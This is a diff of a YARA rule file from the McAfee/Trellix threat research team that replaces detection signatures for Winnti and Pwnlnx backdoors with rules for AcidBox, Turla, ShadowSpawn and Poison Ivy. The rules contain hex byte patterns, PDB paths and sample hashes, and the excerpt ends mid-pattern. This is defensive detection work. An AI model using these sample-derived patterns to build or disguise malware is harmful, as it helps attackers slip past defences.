-		$pdb = "\\Projects\\Jimmy\\jimmydll_v2.0\\JimmyForClan\\Jimmy\\bin\\srelease\\jimmydll\\indsvc32.pdb"
+		$pattern_0 = { 7707 b8022d03a0 eb05 e8???????? }
+		$pattern_1 = { 4403c8 8bc3 41d1c6 33c6 81c6d6c162ca c1cb02 33c7 }
+		$pattern_2 = { e9???????? 412b5c2418 8b45dc 412b442408 41015c241c 410144240c 015f1c }
+		$pattern_3 = { 48895c2408 57 4883ec30 488bfa 33db 4885c9 7479 }
+		$pattern_4 = { 48895c2408 57 4883ec30 498bd8 488bfa 488364245800 85c9 }
+		$pattern_5 = { 488987e0010000 e9???????? 81cb001003a0 e9???????? 488b87a0010000 44847806 742e }
+		$pattern_6 = { 4d8bcc 4c8d0596c50100 498bd4 488bce e8???????? 498b9de0010000 c74605aa993355 }
+		$pattern_7 = { 4533c0 8d5608 e8???????? 488bf0 4889442460 4885c0 750b }
+		$pattern_8 = { 488d5558 41c1ee08 41b802000000 44887559 e8???????? 4c8b4de0 894718 }
+		$pattern_9 = { 4d03c2 4d3bc2 4d13cc 4d0303 4d3b03 4d8903 4c8b13 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and any of them
+		7 of them and filesize < 550912
 }
-rule TRELLIX_ARC_APT_Winnti : BACKDOOR FILE
+rule TRELLIX_ARC_APT_Acidbox_Ssp_Dll_Module : BACKDOOR FILE
 {
 	meta:
-		description = "Detects Winnti variants"
-		author = "McAfee ATR Team"
-		id = "f12b039a-2508-580f-b777-428bbda2c666"
-		date = "2020-06-04"
-		modified = "2020-10-14"
-		reference = "https://attack.mitre.org/software/S0141/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_winnti.yar#L1-L27"
+		description = "Rule to detect the SSP DLL component of AcidBox"
+		author = "Marc Rivero | McAfee ATR Team"
+		id = "ef1511c5-f650-5e65-937c-466f00932183"
+		date = "2020-07-24"
+		modified = "2020-08-14"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_acidbox.yar#L67-L98"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "fd539d345821d9ac9b885811b1f642aa1817ba8501d47bc1de575f5bef2fbf9e"
-		logic_hash = "f94b2c552fbb30e1005e5c75a2f449d60b9558a0916197bed41bf32c6477daef"
+		logic_hash = "4c9b9de11d73587ca1ad1efa5455598e41edc5a9a59fc0339c429a212c1c7941"
 		score = 75
 		quality = 70
 		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
 		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Winnti"
-		actor_type = "Apt"
-		actor_group = "Unknown"
+		malware_family = "Backdoor:W32/Acidbox"
+		actor_type = "APT"
+		actor_group = "Turla"
+		hash1 = "003669761229d3e1db0f5a5b333ef62b3dffcc8e27c821ce9018362e0a2df7e9"
 
 	strings:
-		$pattern = { 9090909090909090909090909090C7????????????C2????90909090909081??????????E9????????CCCCCCCCCC8A??????8B??????538A??8A??568B??578B??????8B??C1????66????8B??C1????F3AB8B??83????F3AA8B??5F5E5BC390909090909090909090909090909083????5333??568D??????535089??????89??????E8????????8A??33??3A??8D??????0F94??83????5389??????528B??89??????C6????????E8????????8B??33??81??????????8D??????0F94??6A??89??????5223??89??????C6????????C6????????E8????????33??66????8D??????6A??0F94??89??????89??????5223??C6????????C6????????E8????????8B??83????33??3B??0F94??23??5E495BF7??1B??8B??83????C38B??????8B??????03??C390909090908B??????85??0F84????????8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??8B??????83????74??83????75??E9????????83????C39090909090909090909090909083????8B??????53558B??????33??568B??????83????5789??????76??81??????????8B??76??BF????????8B??????8D????03??C1????03??89??????3B??76??8B??????68????????6A??52E8????????8B??????8B??????8B??????505351565752E8????????8B??????8B??8B??????2B??8B??83????03??8B??????83????89??????77??03??0F84????????8B??????8B??????2B??03??3B??89??????75??81??????????77??8A??04??EB??83????77??08????EB??83????77??8A??80????88??EB??8D????C6????463D????????89??????76??8D????B8????????F7??C1????8B??33??8B??8B??C1????F3AB8B??83????03??F3AA8B??????81??????????4A89??????75??8B??????8B??88??468A??88??46424B75??8B??????C6????465FC6????46C6????2B??8B??????4633??89??5E5D5B83????C390909090909090909083????8B??????53558B??????568B??????8D????5789??????8B??????83????73??B8????????2B??EB??33??03??8B??2B??C1????8D??????89??????8B??????8B??????8D????3B??0F83????????8B??8B??69??????????8B??????8B??????C1????33??66??????03??8B??????2B??????89??????66??????8B??3B??0F85????????8B??????C7??????????????2B??8B??????8B??2B??0F84????????83????77??8A????0A??88????8B????89??03??E9????????83????77??8A??2C??88??468B????89??8B????89????8B????89????8B????89????03??E9????????83????77??8A??80????88??46EB??8D????C6????463D????????89??????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??8B??????81??????????4889??????75??8B??????8B??8B??????88??468B????89??8B????89????8B????89????8B????89????83????83????83????83????73??85??76??8A????88??46454B75??BB????????8B????8B????33??75??BB????????03??8B????8B??33??8B??????83????3B??73??8B??2B??????85??75??83????83????8B????8B??33??8B??????3B??72??EB??84??75??C1????4384??74??8B??????8B??03??2B??83????89??????77??3D????????77??4880????8A??80????C0????C0????0A??88??46C1????88??46E9????????3D????????77??4883????89??????77??80????80????EB??83????C6????4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????2D????????83????89??????77??8B??80????C1????80????8A??0A??80????88??46C0????88??46C1????88??46E9????????8B??83????C1????80????80????88??4681??????????76??8D????B8????????F7??8B??33??C1????89??????8B??8B??C1????F3AB8B??83????F3AA8B??03??81??????????4875??8B??????88??8A??46C0????88??46C1????88??46E9????????8B??????E9????????8B??????8B??????8B??????2B??89??8B??5F2B??5E5D03??5B83????C390909090909090909090908B??????538B??????55568B??????C7??????????578A??8D????8B??????80????8B??76??81??????????8D????83????8B??83????0F82????????8A??88??40414F75??EB??33??8A??418B??83????0F83????????85??75??80????75??8A????81??????????4184??74??33??8A??418D??????8B??89??83????83????4E74??83????72??8B??89??83????83????83????83????73??85??76??8A??88??40414E75??EB??8A??88??40414E75??33??8A??418B??83????73??33??8B??8A??C1????2B??C1????2B??8A??????????81??????????4188??40478A??88??8A????4088??408A????83????8B??0F84????????8A??88??404183????76??8A??88??404183????76??8A??88??404133??8A??418B??83????72??8B??8B??C1????83????2B??33??8A??C1????2B??4F41C1????4E8A??88??8A????404788??40478A??88??40474E75??EB??83????72??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????8D????66????81??????????C1????2B??83????EB??83????0F82????????8B??8B??83????C1????2B??83????75??80????75??8A????81??????????4184??74??33??8A??418D??????66????81??????????C1????2B??83????3B??74??81??????????83????0F82????????8B??2B??83????0F8C????????8B??89??83????83????83????8B??89??83????83????83????83????73??85??0F86????????8A??88??40474E75??E9????????33??8B??8A??C1????2B??C1????2B??4F41E9????????8B??????2B??3B??89??75??5F5E5D33??5BC31B??5F24??5E5D83????5BC39090909090909090909090909081??????????568B??68????????C7??????????FF??????????83????75??57B9????????33??8D??????66????????????F3AB66AB8D??????5068????????FF??????????83????5F75??6A??68????????FF??????????8B??5E81??????????C390909090909090909090909090568B??E8????????F6????????74??56E8????????83????8B??5EC2????909068????????C7??????????FF??????????85??75??FF??????????C39090909053558B??????5685??5774??8B??????85??74??33??33??33??85??76??8A??????????8A??????????32??80????32??8A????32??33??88????8D????BE????????F7??8D????BF????????8B??33??F7??413B??8B??72??5F5E5D5BC39083????538B??????55565768????????68????????5333??FF??????????8B??85??0F84????????68????????FF??????????8B??B0??88??????88??????8D??????B1??5056C6????????88??????C6????????C6????????C6????????C6????????88??????C6????????C6????????C6????????C6????????FF??????????5753FF??568B??FF??????????85??74??57FF??????????8B??8B??????B9????????8B??68????????50F3A5E8????????83????B8????????5F5E5D5B83????C35F8B??5E5D5B83????C39090538B??????????5657C7??????????8D????BF???????? }
+		$pattern_0 = { 49897ba0 8bc7 49894398 49897ba8 33c9 49894bb0 }
+		$pattern_1 = { 8b8424a8000000 c1e818 88443108 66895c310a 498b0e }
+		$pattern_2 = { 8b5f48 413bdd 410f47dd 85db 0f84f1000000 488b4720 4885c0 }
+		$pattern_3 = { e8???????? 85c0 78c7 488d9424a0020000 488d8c24e0030000 ff15???????? 4c8bf8 }
+		$pattern_4 = { ff15???????? 488bc8 4c8bc6 33d2 ff15???????? 8bfb 895c2420 }
+		$pattern_5 = { 415f c3 4c8bdc 49895b10 }
+		$pattern_6 = { 488d842488010000 4889442420 41bf???????? 458bcf 4c8bc7 418bd7 488d8c2490000000 }
+		$pattern_7 = { c1e908 0fb6c9 3bce 77b6 8bd0 b9???????? c1ea10 }
+		$pattern_8 = { 4c8bc3 ba???????? 488d4c2438 e8???????? 89442430 85c0 7508 }
+		$pattern_9 = { bb02160480 8bc3 488b5c2440 488b742448 488b7c2450 4883c430 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		7 of them and filesize < 199680
 }
-rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_1 : BACKDOOR FILE
+rule TRELLIX_ARC_Apt_Turla_Pdb : BACKDOOR FILE
 {
 	meta:
-		description = "Rule to detect the backdoor pwnlnx variant 1"
+		description = "Rule to detect a component of the APT Turla"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "5b76ca62-460c-5c36-a239-700cc509f2b0"
-		date = "2020-04-17"
+		id = "b39ac7fc-16dd-559e-8ab0-76da5cbbc719"
+		date = "2017-05-31"
 		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L3-L33"
+		reference = "https://attack.mitre.org/groups/G0010/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_turla_pdb.yar#L1-L25"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "0f6033d6f82ce758b576e2d8c483815e908e323d0b700040fbdab5593fb5282b"
-		logic_hash = "1487890494dde891a6dbe7dff7ebd5660ee01fe10220215e680115f168c2ae4a"
+		hash = "3b8bd0a0c6069f2d27d759340721b78fd289f92e0a13965262fea4e8907af122"
+		logic_hash = "d519317c936a38f189bf0de908902ec4e3e079c8c7463c8881ceb332c0a82a26"
 		score = 75
 		quality = 70
 		tags = "BACKDOOR, FILE"
 		rule_version = "v1"
 		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
-		actor_type = "Cybercrime"
+		malware_family = "Backdoor:W32/Turla"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$bp = { 7F??4C4602??01??000000000000000002??3E????0000????1A????0000000040000000000000??????0000000000000000000040??????????????1D????????0000????????????000000000000??????4000000000??????4000000000????01??00000000????01??00000000????000000000000????0000??????0000????000000000000????4000000000000002????000000001C??0000000000001C??00000000000001??00000000000001??000005????????0000000000000000??????0000000000004000000000????76??00000000????76??000000000000????00000000????0000????0000000080????00000000????????????0000????????????000038??00000000000080??????00000000000020??0000000002??0000060000????80????0000000028??????????000028??????????0000A0????????0000????????????0000????000000000000??????000004??00001C??0000000000001C??4000000000??????4000000000????000000000000????000000000000??????00000000000050E5??6404??00009C6D0000000000009C6D4000000000??????????????0000DC??000000000000DC??00000000000004??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000????6C69????????????2D????????78??78??362D????????6F2E32??04??000010??000001??0000474E5500000000????0000????0000????000000000000????0000??????000001??000006000000000000????000020??0000??????00007D??5A580000000000000000000000000000000000000000000000000000000015????????00000000000000000000??????00000000000082????????00000000000000000000????????????0000????????????00000000000000000000????????????0000??????000012??0000000000000000000062??0000000000006A??000012??000000000000000000001B??0000000000007E??000012??000000000000000000008B??0000000000004902??????00000000000000000000????????????0000????????????00000000000000000000????????00000000??????000012??000000000000000000008E??000000000000F401??????00000000000000000000????????????0000????????????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????0000????000000000000000000000000000000000000????0000????000000000000000000000000000000000000??????000012??0000000000000000000025????????0000????????????00000000000000000000????000000000000????0000????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????0000????00000000000000000000????000000000000????02??????00000000000000000000????????????0000????01??????00000000000000000000??????0000000000006602??????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????01??????00000000000000000000????000000000000????????????00000000000000000000????000000000000????01??????00000000000000000000????000000000000????0000????00000000000000000000????01??00000000????????????00000000000000000000????????????0000????????????00000000000000000000??????000000000000EC01??????00000000000000000000??????0000000000004B01??????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????01??????00000000000000000000????????????0000??????000012??0000000000000000000008??0000000000004302??????00000000000000000000????????????0000??????????????000000000000000000000A??0000000000003F01??????00000000000000000000????????????0000??????000012??00000000000000000000F0????00000000????01??????00000000000000000000??????????????00002F02??????00000000000000000000????01??00000000????????????00000000000000000000????000000000000??????????????0000000000000000000080????00000000????02??????00000000000000000000????000000000000??????000012??0000000000000000000074??000000000000BF????????00000000000000000000????????????0000????02??????00000000000000000000??????000000000000FA0000????00000000000000000000????????????0000??????000012??0000000000000000000011??000000000000A8??000012??0000000000000000000044000000000000??????000012??000000000000000000005A000000000000??????000012??0000000000000000000029??000000000000C6????????00000000000000000000????000000000000????????????00000000000000000000????000000000000????0000????00000000000000000000????????00000000????????????00000000000000000000??????000000000000BC????????00000000000000000000????02??00000000????01??????00000000000000000000??????00000000000034??000012??00000000000000000000A1????????0000????????????00000000000000000000????????????0000??????????????000000000000000000004B000000000000????0000????00000000000000000000????000000000000??????000012??0000000000000000000005????????0000??????000012??0000000000000000000031??00000000000074??000012??00000000000000000000FF??0000000000005E02??????00000000000000000000????000000000000????????????00000000000000000000????????????0000??????000012??0000000000000000000025????????0000????02??????00000000000000000000??????000000000000DE??000012??000000000000000000007B??00000000000030??000012??0000000000000000000075??000000000000D9??000012??000000000000000000000E000000000000????????????00000000000000000000????000000000000????02??????00000000000000000000????????????0000????????????00000000000000000000????????????0000????????????00000000000000000000????000000000000????02??????00000000000000000000????000000000000????01??????00000000000000000000????????????0000????????????00000000000000000000????000000000000????????????00000000000000000000??????0000000000005201??????0000????174000000000????00000000000000005F5F676D6F6E5F73??6172??5F5F??????76??52656769????????????6173??6573??6C69????????????61642E????2E30??72??63????72??6D??????68????????5F63????6174????????6E6474????????75??65??????69??????????????6E6F5F6C6F63????69????????????6B????74??72??6164??73??676D6173????????6E6E6563??????74??72??6164??73??6C66??????63????74??70??68????????5F6465????63????6663????6C????????63??73??2E????????63????74??73??72??70????????69????????????????????616E64??????6574??6174??6E??????74??77??69??????????????6469????????????5F6E74??61??????74??72??69??????????????70??????????6D6F6E????????74??6E??????6C6563??????6B????????72??616C6C6F63??676574??69??????????????73??72??6F6B????63????77????????70??6173??72??3634??73??67656D70??79??6574??6D656D73??74??72??6469??????????????????6565??????68????????6173??74??6D65??????74??6F63????70????????616E74??74??6475??32??73??67616464????74??69????????????6472??6663??????65??????74??6F63????70????????6C6C6F63??73??72??6174??72??616C70??74????????6D6F76????????656E6469????????????6C??????74??6F73??62????616D65??????6563??????????72??74????????656164??????6C6F63????74??6C6F63????74??6D65??????616E6469????????????616464??????????????6565????73??74??69????????????????????6D6D6F76????????70??6E3634??5F5F6C69????????????72??5F6D6169????????????73??73??70??69????????????65????????78??74??74??34??474C4942435F32??32??35????????42435F32??33??000002??02??02??03??02??02??02??03??03??02??02??02??0000000002??02??02??02??02??03??02??02??02??02??02??02??02??02??03??02??02??02??04??02??02??03??02??03??02??02??02??03??02??02??02??02??02??03??02??02??02??02??02??02??03??02??02??03??02??02??02??03??02??03??02??03??02??02??02??02??02??02??03??03??03??02??02??02??02??02??000001??01??24??000010??000020??000075??69??????????9602??00000000????????????????????000000000000????69????????????A2????????0000??????69??????????9602??00000000????81????????????060000????????????000000000000????81????????????070000????00000000000000000000????81????????????070000????00000000000000000000????81????????????070000????00000000000000000000000082??????0000????0000??????0000000000000000000008??????????0000070000????????????000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000????82??????0000????0000????00000000000000000000??????6000000000????0000??????000000000000000000004882??????0000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000????00000000000000000000??????6000000000????0000?????? }
+		$pdb = "\\Workshop\\Projects\\cobra\\carbon_system\\x64\\Release\\carbon_system.pdb"
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 650KB and any of them
 }
-rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_2 : BACKDOOR FILE
+
+rule TRELLIX_ARC_Shadowspawn_Utility : UTILITY FILE
 {
 	meta:
-		description = "Rule to detect the backdoor pwnlnx variant 2"
+		description = "Rule to detect ShadowSpawn utility used in the SoftCell operation"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "c4ee686b-49d9-5566-b749-1144a19c1fee"
-		date = "2020-04-17"
+		id = "0a325f5c-2750-5354-b920-f7e1510a8b71"
+		date = "2019-06-25"
 		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L35-L65"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L3-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "08cc67002782cbafd97a4bff549d25dd72d6976d2fdf79339aaf5a3ff7c3107e"
-		logic_hash = "08ea40ba72677263a41f62097fc38040361ba595d67cb04979b66548c7f4d271"
+		logic_hash = "0f2805aee60cdb4eb932768849c845052c92131d0b25a511b822b79b2ac93e24"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "UTILITY, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
-		actor_type = "Cybercrime"
+		malware_type = "utility"
+		malware_family = "Trojan:W32/ShadowSpawn"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????00000000000088????????????00000000??????38??05????????????????0000????????????0000000000000000??????0000000000004000000000??????0D??????????????0D????????0000????00000000????0000????0000????????????0000????????????0000????????????0000????12??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????????00000000????????00000000??????000000000000070000??????000080??????0000000080??????0000000080??????0000000028??00000000000070??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000????0000????0000??????000014??000003??0000474E55????????????CC78??78??83????????????CB371F0000000080??????0000000025????????0000????7E??00000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000????????????0000??????4200000000????????????0000????????????0000??????4200000000????????????0000????????????0000????????????0000????76??00000000????????????0000????8B????00000000C8??????0000000025????????0000??????4200000000????76??00000000????????????0000????444200000000????76??00000000????????????0000??????4900000000????76??00000000????????????0000??????4600000000????76??00000000????????????0000????424200000000??????EC08??33??0000E8????????E8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090554889??534883????80????????????75??BB????????488B??????????4881??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??B8????????4885??74??BF????????E8????????C6????????????4883????5BC9C30F1F????????????55B8????????4885??4889??74??BE????????BF????????E8????????4883????????????74??B8????????4885??74??BF????????C9FF??0F1F??????????C9C39090554889??534881??????????89??????????48C7????????????8B????3D????????0F87????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????BA????????488D??????????4889??4889??E8????????4889????4883??????0F84????????488D??????????488D??????????4889??4889??E8????????85??0F85????????488B??????????4889????C7????????????488B????89????488B????48C1????89????488B????4889????488B????4889??????488B????4889??????E8????????89????BE????????488D????E8????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????488D????8B??????????BA????????4889??89??E8????????85??0F84????????BE????????488D????E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??0F85????????8B????89??4889??48C1????8B????89??488D????4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????7E??8B????488D??????????89??4889??E8????????8B????4863??488D??????????8B??????????4889??89??E8????????85??74??8B????48984801????488B????483B????7C??EB??90EB??90EB??90EB??90EB??90EB??90488B????4889??E8????????EB??90EB??90EB??90B8????????4881??????????5BC9C3554889??534881??????????4889??????????E8????????4889??E8????????C7????????????488B??????????8B????89????488B??????????8B??89????488B??????????8B????89????8B????8B????BA????????89??89??E8????????89????83??????0F84????????488D????BA????????BE????????4889??E8????????C7????????????C7????????????8B????89????488B????4889????488B????4889??????488B????4889??????E8????????89????488D????BE????????4889??E8????????488D????8B????BA????????4889??89??E8????????85??0F84????????488D??????????4889??E8????????488D??????????BE????????4889??E8????????488D??????????8B????BA????????4889??89??E8????????85??0F84????????488D????8B????BA????????4889??89??E8????????85??74??488D????BE????????4889??E8????????8B????488B????4889????488B????4889??????488B????4889??????E8????????39??75??8B????83????75??8B????488B????4889????488B????4889??????488B????4889??????89??E8????????EB??90EB??90EB??90EB??90EB??908B????89??E8????????B8????????4881??????????5BC9C390554889??4889????89????C7????????????488B????4889????C7????????????EB??488B????0FB6??8B????89??C1????F7????89??48980FB6??????????89??31??488B????88??83??????4883??????8B????3B????7C??488B????C9C3554889??4889????89????488B????4889????C7????????????EB??488B????0FB6??0FB6??????????31??488B????88??83??????4883??????8B????3B????7C??488B????C9C39090554889??534881??????????89??????????48C7????????????48C7????????????48C7????????????8B????89??488D??????????8B??????????4889??89??E8????????85??0F84????????8B????89??488D??????????89??4889??E8????????488D??????????488D??????????4889??4889??E8????????BA????????488D??????????488D??????????BE????????4889??B8????????E8????????488D??????????4889??E8????????4883????4889??E8????????4889????4883??????0F84????????488D??????????488B????4889??4889??E8????????488D??????????488D????B9????????BA????????4889??4889??E8????????89????83??????0F8E????????C7????????????E9????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????488D??????????4989??BE????????4889??B8????????E8????????488D??????????488D??????????4889??4889??E8????????85??0F85????????48C7????????????48C7????????????488D??????????4883????4889??E8????????4889??E8????????488B??????????8B??????????4189??4181??????????8B??????????89??81??????????488B????8B????4863??48C1????4801??488B??488D????BA????????488D??????????4889??????4889??????488B????4889??????488B????4889????4589??4189??4889??BE????????4889?? }
+		$pdb = "C:\\data\\projects\\shadowspawn\\src\\bin\\Release-W2K3\\x64\\ShadowSpawn.pdb" fullword ascii
+		$op0 = { e9 34 ea ff ff cc cc cc cc 48 8d 8a 20 }
+		$op1 = { 48 8b 85 e0 06 00 00 48 8d 34 00 48 8d 46 02 48 }
+		$op2 = { e9 34 c1 ff ff cc cc cc cc 48 8b 8a 68 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 1000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( pe.imphash ( ) == "eaae87b11d2ebdd286af419682037b4c" and all of them )
 }
-rule TRELLIX_ARC_Pwnlnx_Backdoor_Variant_3 : BACKDOOR FILE
+
+rule TRELLIX_ARC_Poison_Ivy_Softcell : RAT FILE
 {
 	meta:
-		description = "Rule to detect the backdoor pwnlnx variant"
+		description = "Rule to detect Poison Ivy used in the SoftCell operation"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "02ea1eb2-7235-5ed5-86ba-19d52e8fb428"
-		date = "2020-04-17"
+		id = "c362b116-4cb6-5393-9c64-28e8d2886dc7"
+		date = "2019-06-25"
 		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L67-L97"
+		reference = "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Operation_SoftCell.yar#L34-L72"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "08f29e234f0ce3bded1771d702f8b5963b144141727e48b8a0594f58317aac75"
-		logic_hash = "8a1405f430ce57810577f65ef43a1425601bf49b5adb4f6f935505427ad9dc94"
+		logic_hash = "ac84023404d76adf8cfd8d26bb59fb51f29057748806c4f5ea0634803fd937cd"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RAT, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
-		actor_type = "Cybercrime"
+		malware_type = "rat"
+		malware_family = "Rat:W32/PoisonIvy"
+		actor_type = "Apt"
 		actor_group = "Unknown"
 
 	strings:
-		$bp = { 7F??4C4602??01??000000000000000002??3E????0000000004??00000000??????000000000000B0??3A??000000000000000040??????????????????????01??000005????????0000000000000000??????0000000000004000000000????????????0000????????????00000000????00000000????0000????0000????A40C??00000000C0??????????????C0??????????????5013??00000000????????????00000000????00000000??????000004??00005801??00000000??????4000000000??????4000000000????000000000000????000000000000??????000000000000070000??????0000C0??????????????C0??????????????C0??????????????28??00000000000078??00000000000008??00000000000051E5??64??000000000000000000000000000000000000000000000000000000000000000000000000000000000000????000000000000??????000010??000001??0000474E5500000000????0000??????000000000000C0????????????????????????0000????84????00000000C8??????0000000025????????0000????374200000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000??????4200000000????A56C00000000????????????0000????24??00000000????A56C00000000????????????0000????????????0000????A56C00000000????????????0000????83??????0000????A56C00000000????????????0000????5E42000000000000A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????914200000000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000????????????0000????A66C00000000????????????0000??????4200000000????A66C00000000????????????0000??????4200000000??????EC08??4301??????62??0000E8????????4883????C3FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????FF??????????68????????E9????????00000000000000000000000000000000000000000000000031??4989??5E4889??4883????505449C7??????????48C7??????????48C7??????????E8????????F490904883????488B??????????4885??74??FF??4883????C390909090909090909090909090B8????????55482D????????4883????4889??76??B8????????4885??74??5DBF????????FF??660F1F????????????5DC366666666????????????????????BE????????554881??????????48C1????4889??4889??48C1????4801??48D1??74??B8????????4885??74??5DBF????????FF??0F1F??5DC3660F1F??????80????????????75??554889??53BB????????4881??????????4883????488B??????????48C1????4883????4839??73??660F1F??????4883????4889??????????FF????????????488B??????????4839??72??E8????????B8????????4885??74??BF????????E8????????C6????????????4883????5B5DF3??669055B8????????4885??4889??74??BE????????BF????????E8????????BF????????4883????75??5DE9????????6690B8????????4885??74??FF??EB??9090554889??534881??????????89??????????48C7????????????8B????3D????????76??E9????????8B????89??488D??????????8B??????????4889??89??E8????????85??75??E9????????8B????89??488D??????????89??4889??E8????????488D??????????BE????????4889??E8????????4889????4883??????75??E9????????488D??????????488D??????????4889??4889??E8????????85??74??E9????????488B??????????4889????C7????????????488B????89????488B????48C1????89????4883????FF????FF????FF????E8????????4883????89????BE????????488D????E8????????8B??????????BA????????488D????89??E8????????85??75??E9????????8B??????????BA????????488D????89??E8????????85??75??E9????????BE????????488D????E8????????8B????4883????FF????FF????FF????E8????????4883????39??74??E9????????8B????89??48C1????4889??8B????89??4801??4889????488B????488B????BA????????4889??4889??E8????????488B????4889????EB??488B????488D??????????4889??BA????????BE????????4889??E8????????89????83??????